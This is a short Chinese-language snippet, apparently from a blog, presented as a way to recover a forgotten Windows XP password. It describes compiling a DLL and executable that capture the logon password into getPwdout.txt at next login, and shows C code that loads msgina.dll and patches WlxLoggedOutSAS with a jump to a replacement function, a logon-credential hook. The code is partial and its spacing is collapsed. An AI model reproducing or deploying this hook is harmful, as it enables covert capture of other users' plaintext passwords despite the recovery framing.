应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORDWINAPIStartHook(LPVOIDlpParam)
{
//得到msgina.dll
//hooktable.hMsgina
intn=0;
hooktable.hMsgina=LoadLibrary("msgina.dll");
n =GetLastError();
if(NULL==hooktable.hMsgina)
{
printf("getmoduleHandlemsgina.dllerror");
return-1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR=(WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina,"WlxLoggedOutSAS");
if(NULL==hooktable.OldADDR)
{
printf("GetProcAddressWlxLoggedOutSASerror");
return-1;
}
int*OpCode=(int*)&hooktable.charJmpCode[1];
intCode=(int)hooktable.NewADDR-(int)hooktable.OldADDR-5;
*OpCode=Code;
HookWlxLoggedOutSAS();
return0;
}